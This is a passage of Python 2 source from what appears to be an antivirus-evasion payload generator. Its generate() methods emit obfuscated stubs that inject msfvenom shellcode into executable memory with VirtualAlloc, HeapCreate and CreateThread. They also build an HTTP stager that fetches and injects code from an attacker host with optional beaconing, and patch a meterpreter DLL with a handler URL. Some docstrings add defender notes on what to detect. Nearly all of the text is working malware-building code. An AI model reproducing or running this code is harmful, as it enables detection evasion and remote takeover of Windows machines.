        payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" %(ptrName, bufName, byteArrayName)
        payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(handleName, ptrName)
        payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" %(handleName)

        # download the meterpreter .dll from LHOST:LPORT and inject it
        payloadCode += "%s = ''\n" %(data2Name)
        payloadCode += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
        payloadCode += "%s(%s)\n" %(injectMethodName, data2Name)

        # optional wrapping of the whole text by pyherion
        if self.required_options["USE_PYHERION"][0].lower() == "y":
            payloadCode = encryption.pyherion(payloadCode)

        return payloadCode
    def generate(self):
        """Build Python 2 source that embeds msfvenom shellcode and runs it in-process.

        The escaped shellcode is stored with one hex letter (``a``-``f``)
        swapped for one non-hex letter (``g``-``z``) via ``string.maketrans``;
        the emitted program applies the reverse table and then decodes with
        ``string_escape``. Two options pick one of six branches:

        * ``inject_method``: ``"virtual"`` uses VirtualAlloc/RtlMoveMemory/
          CreateThread, ``"heap"`` uses HeapCreate/HeapAlloc/RtlMoveMemory/
          CreateThread, and any other value casts a ctypes string buffer to a
          function pointer and calls it.
        * ``expire_payload``: ``"x"`` emits the code unconditionally; any
          other value is taken as a number of days, and the emitted code only
          runs while ``datetime.now()`` is before today plus that many days
          (the date is compared in ``%y-%m-%d`` form, century dropped).

        ``use_pyherion`` == ``"y"`` wraps the result with pyherion.

        Returns:
            The generated program as a string.

        Defender notes: the shellcode is hidden only by a single-letter
        substitution and is therefore recoverable from the emitted file. The
        ``virtual`` and ``heap`` branches allocate executable memory
        (``0x40`` = PAGE_EXECUTE_READWRITE; the heap is created with
        ``0x00040000`` = HEAP_CREATE_ENABLE_EXECUTE) and start a thread into
        it, which is the behaviour to alert on. The heap branches call
        ``crypters.pyherion`` whereas every other branch calls
        ``encryption.pyherion``.
        """
        # Random letter substitution: one hex-digit letter is swapped for one
        # non-hex letter, and the emitted program swaps it back
        hex_letters = "abcdef"
        non_hex_letters = "ghijklmnopqrstuvwxyz"
        encode_with_this = random.choice(hex_letters)
        decode_with_this = random.choice(non_hex_letters)

        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()

        # Generate Random Variable Names
        subbed_shellcode_variable_name = helpers.randomString()
        shellcode_variable_name = helpers.randomString()
        rand_ptr = helpers.randomString()
        rand_buf = helpers.randomString()
        rand_ht = helpers.randomString()
        rand_decoded_letter = helpers.randomString()
        rand_correct_letter = helpers.randomString()
        rand_sub_scheme = helpers.randomString()

        # Create Letter Substitution Scheme (Python 2 string.maketrans table)
        sub_scheme = string.maketrans(encode_with_this, decode_with_this)

        # Escaping Shellcode so it can be embedded as a string literal
        Shellcode = Shellcode.encode("string_escape")

        if self.required_options["inject_method"][0].lower() == "virtual":
            if self.required_options["expire_payload"][0].lower() == "x":

                # Create Payload File (no expiry check)
                payload_code = 'import ctypes\n'
                payload_code += 'from string import maketrans\n'
                payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
                payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
                payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
                payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
                    sub_scheme) + '\"\n'
                payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
                payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
                payload_code += rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
                payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
                payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
                payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    payload_code = encryption.pyherion(payload_code)

                return payload_code

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(
                    days=int(self.required_options["expire_payload"][0])))

                # Extra Variables
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # Create Payload File; the whole body is guarded by the
                # now-before-expiry comparison
                payload_code = 'import ctypes\n'
                payload_code += 'from string import maketrans\n'
                payload_code += 'from datetime import datetime\n'
                payload_code += 'from datetime import date\n\n'
                payload_code += RandToday + ' = datetime.now()\n'
                # expiredate[2:] drops the century so it matches the %y format
                payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[
                    2:] + '\",\"%y-%m-%d\") \n'
                payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
                payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
                payload_code += '\t' + rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
                payload_code += '\t' + subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
                    sub_scheme) + '\"\n'
                payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
                payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
                payload_code += '\t' + rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
                payload_code += '\t' + rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
                payload_code += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
                payload_code += '\t' + rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                payload_code += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    payload_code = encryption.pyherion(payload_code)

                return payload_code

        if self.required_options["inject_method"][0].lower() == "heap":
            if self.required_options["expire_payload"][0].lower() == "x":

                HeapVar = helpers.randomString()

                # Create Payload File (no expiry check)
                payload_code = 'import ctypes\n'
                payload_code += 'from string import maketrans\n'
                payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
                payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
                payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
                payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
                    sub_scheme) + '\"\n'
                payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
                payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
                # the next line repeats the previous assignment and recomputes the same value
                payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
                # HeapCreate(0x00040000 = HEAP_CREATE_ENABLE_EXECUTE), HeapAlloc(0x00000008 = HEAP_ZERO_MEMORY)
                payload_code += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + shellcode_variable_name + ') * 2),ctypes.c_int(0))\n'
                payload_code += rand_ptr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + shellcode_variable_name + ')))\n'
                payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
                payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
                payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'

                # NOTE: this branch uses crypters.pyherion, the virtual/cast branches use encryption.pyherion
                if self.required_options["use_pyherion"][0].lower() == "y":
                    payload_code = crypters.pyherion(payload_code)

                return payload_code

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(
                    days=int(self.required_options["expire_payload"][0])))

                # Extra Variables
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                HeapVar = helpers.randomString()

                # Create Payload File; the whole body is guarded by the
                # now-before-expiry comparison
                payload_code = 'import ctypes\n'
                payload_code += 'from string import maketrans\n'
                payload_code += 'from datetime import datetime\n'
                payload_code += 'from datetime import date\n\n'
                payload_code += RandToday + ' = datetime.now()\n'
                # expiredate[2:] drops the century so it matches the %y format
                payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[
                    2:] + '\",\"%y-%m-%d\") \n'
                payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
                payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
                payload_code += '\t' + rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
                payload_code += '\t' + subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
                    sub_scheme) + '\"\n'
                payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
                payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
                # the next line repeats the previous assignment and recomputes the same value
                payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
                # HeapCreate(0x00040000 = HEAP_CREATE_ENABLE_EXECUTE), HeapAlloc(0x00000008 = HEAP_ZERO_MEMORY)
                payload_code += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + shellcode_variable_name + ') * 2),ctypes.c_int(0))\n'
                payload_code += '\t' + rand_ptr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + shellcode_variable_name + ')))\n'
                payload_code += '\t' + rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
                payload_code += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
                payload_code += '\t' + rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                payload_code += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'

                # NOTE: this branch uses crypters.pyherion, the virtual/cast branches use encryption.pyherion
                if self.required_options["use_pyherion"][0].lower() == "y":
                    payload_code = crypters.pyherion(payload_code)

                return payload_code

        else:
            # any inject_method other than "virtual"/"heap": ctypes function-pointer cast
            if self.required_options["expire_payload"][0].lower() == "x":

                # Additional random variable names (rand_reverse_shell is
                # generated but never used in the emitted text)
                rand_reverse_shell = helpers.randomString()
                rand_memory_shell = helpers.randomString()
                rand_shellcode = helpers.randomString()

                # Create Payload File (no expiry check)
                payload_code = 'from ctypes import *\n'
                payload_code += 'from string import maketrans\n'
                payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
                payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
                payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
                payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
                    sub_scheme) + '\"\n'
                payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
                payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
                payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
                payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
                payload_code += rand_shellcode + '()'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    payload_code = encryption.pyherion(payload_code)

                return payload_code

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(
                    days=int(self.required_options["expire_payload"][0])))

                # Extra Variables
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # Additional random variable names (rand_reverse_shell is
                # generated but never used in the emitted text)
                rand_reverse_shell = helpers.randomString()
                rand_memory_shell = helpers.randomString()
                rand_shellcode = helpers.randomString()

                # Create Payload File; the whole body is guarded by the
                # now-before-expiry comparison
                payload_code = 'from ctypes import *\n'
                payload_code += 'from string import maketrans\n'
                payload_code += 'from datetime import datetime\n'
                payload_code += 'from datetime import date\n\n'
                payload_code += RandToday + ' = datetime.now()\n'
                # expiredate[2:] drops the century so it matches the %y format
                payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[
                    2:] + '\",\"%y-%m-%d\") \n'
                payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
                payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
                payload_code += '\t' + rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
                payload_code += '\t' + subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
                    sub_scheme) + '\"\n'
                payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
                payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
                payload_code += '\t' + rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
                payload_code += '\t' + rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
                payload_code += '\t' + rand_shellcode + '()'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    payload_code = encryption.pyherion(payload_code)

                return payload_code
    def generate(self):
        """Build Python 2 source for an HTTP download-and-inject stager with optional beaconing.

        Options read from ``self.required_options``: ``DOWNLOAD_HOST``,
        ``DOWNLOAD_PORT`` and ``DOWNLOAD_NAME`` form the URL
        ``http://host:port/name``; ``BEACON`` (``"y"``/``"n"``) decides whether
        a daemon thread re-fetches and re-injects every ``BEACON_SECONDS``
        seconds forever; ``USE_PYHERION`` == ``"y"`` wraps the result with
        ``encryption.pyherion``.

        Returns:
            The generated program as a string.

        Note: ``global_vars`` is only bound when ``BEACON`` lower-cases to
        exactly ``"y"`` or ``"n"``; any other value raises UnboundLocalError
        at the first ``+=`` below.

        Defender notes: the emitted program fetches plain-HTTP content, copies
        it into ``VirtualAlloc(..., 0x3000, 0x40)`` memory
        (PAGE_EXECUTE_READWRITE), pins it with ``VirtualLock`` and starts a
        thread on it; with beaconing on it repeats that on a fixed interval,
        so periodic identical HTTP GETs from a Python process followed by RWX
        allocations are the observable pattern.
        """

        imports = "import sys; import urllib2; import ctypes; import time; import signal; import threading\n"

        # Randomised names for the four generated functions
        inject_func = helpers.randomString()
        getexec_func = helpers.randomString()
        main_func = helpers.randomString()
        beaconthr_func = helpers.randomString()

        # Module-level flag in the emitted program: True enables the beacon loop
        retry_var = helpers.randomString()
        if self.required_options["BEACON"][0].lower() == 'n':
            global_vars = "%s = False" % retry_var
        elif self.required_options["BEACON"][0].lower() == 'y':
            global_vars = "%s = True" % retry_var

        interval_var = helpers.randomString()
        opener_var = helpers.randomString()

        # Beacon interval (seconds) and a shared urllib2 opener
        global_vars += "\n%s = %s" % (interval_var, self.required_options["BEACON_SECONDS"][0])
        global_vars += "\n%s = urllib2.build_opener()\n" % (opener_var)

        shellcode_var = helpers.randomString()
        ptr_var = helpers.randomString()
        ht_var = helpers.randomString()
        buff_var = helpers.randomString()

        # Injector: VirtualAlloc (0x3000 commit+reserve, 0x40 PAGE_EXECUTE_READWRITE),
        # VirtualLock, RtlMoveMemory, CreateThread, then block on the thread
        inject = "def %s(%s):" % (inject_func, shellcode_var)
        inject += "\n\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))" % (ptr_var, shellcode_var)
        inject += "\n\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))" % (ptr_var, shellcode_var)
        inject += "\n\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)" % (buff_var, shellcode_var, shellcode_var)
        inject += "\n\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))" % (ptr_var, buff_var, shellcode_var)
        inject += "\n\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))" % (ht_var, ptr_var)
        inject += "\n\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % ht_var

        # Fresh names for the fetch function (shellcode_var is deliberately
        # re-drawn so the two functions use different local names)
        url_var = helpers.randomString()
        shellcode_var = helpers.randomString()
        info_var = helpers.randomString()
        thread_var = helpers.randomString()
        thread_name = helpers.randomString()
        thread_name2 = helpers.randomString()

        # Fetch-and-inject: GET the URL through the shared opener and hand the
        # body to the injector; every exception is swallowed
        getexec = "def %s(%s):" % (getexec_func, url_var)
        getexec += "\n\ttry:"
        getexec += "\n\t\t%s = %s.open(%s)" % (info_var, opener_var, url_var)
        getexec += "\n\t\t%s = %s.read()" % (shellcode_var, info_var)
        getexec += "\n\t\t%s = bytearray(%s)" % (shellcode_var, shellcode_var)
        getexec += "\n\t\t%s(%s)" % (inject_func, shellcode_var)
        getexec += "\n\texcept Exception:"
        getexec += "\n\t\tpass\n"

        # url_var is re-drawn here, so the beacon and main functions share a
        # name that differs from the fetch function's parameter
        url_var = helpers.randomString()

        # Beacon loop: sleep the interval, then run the fetch in a daemon thread, forever
        beaconthr = "def %s(%s):" % (beaconthr_func, url_var)
        beaconthr += "\n\twhile True:"
        beaconthr += "\n\t\ttime.sleep(%s)" % interval_var
        beaconthr += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, getexec_func, url_var)
        beaconthr += "\n\t\t%s.setDaemon(True)" % thread_var
        beaconthr += "\n\t\t%s.start()\n" % thread_var

        # Entry point: build the URL, start the beacon thread when the flag is
        # True, do one immediate fetch, and (beacon mode only) idle forever so
        # the daemon thread keeps running
        main = "def %s():" % main_func
        main += "\n\t%s = 'http://%s:%s/%s'" % (url_var, self.required_options['DOWNLOAD_HOST'][0], self.required_options['DOWNLOAD_PORT'][0], self.required_options['DOWNLOAD_NAME'][0])
        main += "\n\tif %s is True:" % retry_var
        main += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, beaconthr_func, url_var)
        main += "\n\t\t%s.setDaemon(True)" % thread_var
        main += "\n\t\t%s.start()" % thread_var
        main += "\n\t%s(%s)" % (getexec_func, url_var)
        if self.required_options["BEACON"][0].lower() == 'y':
            main += "\n\twhile True:"
            main += "\n\t\ttime.sleep(0.1)"
        main += "\nif __name__ == '__main__':"
        main += "\n\t%s()" % main_func

        # Assemble the emitted program in definition order
        PayloadCode = imports + global_vars + inject + getexec + beaconthr + main

        if self.required_options["USE_PYHERION"][0].lower() == "y":
            PayloadCode = encryption.pyherion(PayloadCode)

        return PayloadCode
    def generate(self):

        # lambda function used for patching the metsvc.dll
        dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]

        # patch the metsrv.dll header
        meterpreterDll, headerPatch = helpers.selfcontained_patch()
        meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)

        # patch in the default user agent string
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)

        # turn off SSL
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTP\x00"
        meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)

        # replace the URL/port of the handler
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00"
        meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
        
        # replace the expiration timeout with the default value of 300
        expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
        expirationTimeout = struct.pack('<I', 604800)
        meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)

        # replace the communication timeout with the default value of 300
        communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
        communicationTimeout = struct.pack('<I', 300)
        meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)

        # compress/base64 encode the dll
        compressedDll = helpers.deflate(meterpreterDll)
        
        # actually build out the payload
        payloadCode = ""
        
        # traditional void pointer injection
        if self.required_options["inject_method"][0].lower() == "void":

            # doing void * cast
            payloadCode += "from ctypes import *\nimport base64,zlib\n"

            randInflateFuncName = helpers.randomString()
            randb64stringName = helpers.randomString()
            randVarName = helpers.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            randVarName = helpers.randomString()
            randFuncName = helpers.randomString()
            
            payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
            payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
            payloadCode += randFuncName+"()\n"

        # VirtualAlloc() injection
        else:

            payloadCode += 'import ctypes,base64,zlib\n'

            randInflateFuncName = helpers.randomString()
            randb64stringName = helpers.randomString()
            randVarName = helpers.randomString()
            randPtr = helpers.randomString()
            randBuf = helpers.randomString()
            randHt = helpers.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
            payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
            payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
            payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'

        
        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = encryption.pyherion(payloadCode)

        return payloadCode
    def generate(self):
        """Build the Python source of a shellcode-injection stub and return it.

        Two entries of ``self.required_options`` (presumably a dict of
        ``[value, description]`` lists; only index 0 is read) select one of
        six emission paths:

        * ``inject_method``: ``"virtual"`` (VirtualAlloc + CreateThread),
          ``"heap"`` (HeapCreate/HeapAlloc + CreateThread) or anything else
          (ctypes ``create_string_buffer`` cast to a function pointer).
        * ``expire_payload``: ``"x"`` emits an unconditional stub; any other
          value is passed to ``int()`` as a number of days and the emitted
          stub only runs while ``datetime.now()`` is before that date.

        Every leaf is written out in full with no shared helper, so a change
        to one emission path has to be mirrored in the other five.  The
        emitted stub is Python 2 only: it relies on ``str.decode('base64')``
        and the ``string_escape`` codec, neither of which exists in Python 3.

        Returns:
            str: the stub source, wrapped by ``encryption.pyherion`` when
            ``use_pyherion`` is ``"y"``.

        Raises:
            ValueError: from ``int()`` when ``expire_payload`` is neither
                ``"x"`` nor an integer string.
            KeyError: when ``inject_method``, ``expire_payload`` or
                ``use_pyherion`` is missing from ``self.required_options``.
        """
        if self.required_options["inject_method"][0].lower() == "virtual":
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()
        
                # Base64 Encode Shellcode (embedded as a string literal in the stub)
                EncodedShellcode = base64.b64encode(Shellcode)    

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandT = helpers.randomString()
                    
                PayloadCode = 'import ctypes\n'
                PayloadCode +=  'import base64\n'
                PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
                PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
                # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: a private
                # RWX region followed by a thread started at its base address is the classic
                # self-injection sequence that memory scanners and EDR API hooks key on.
                # Addresses and handles are marshalled as c_int throughout.
                PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
                PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName  + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                # -1 is INFINITE: the stub blocks until the injected thread exits.
                PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:
                # Get our current date and add number of days to the date.
                # str(date) gives "YYYY-MM-DD"; the stub below slices off the century
                # ([2:]) so that it matches the "%y-%m-%d" strptime format.
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()
        
                # Base64 Encode Shellcode
                EncodedShellcode = base64.b64encode(Shellcode)    

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandT = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                PayloadCode = 'import ctypes\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'from datetime import datetime\n'
                # `date` is imported into the stub but never used by it.
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                # strptime with a date-only format yields midnight, so the stub stops
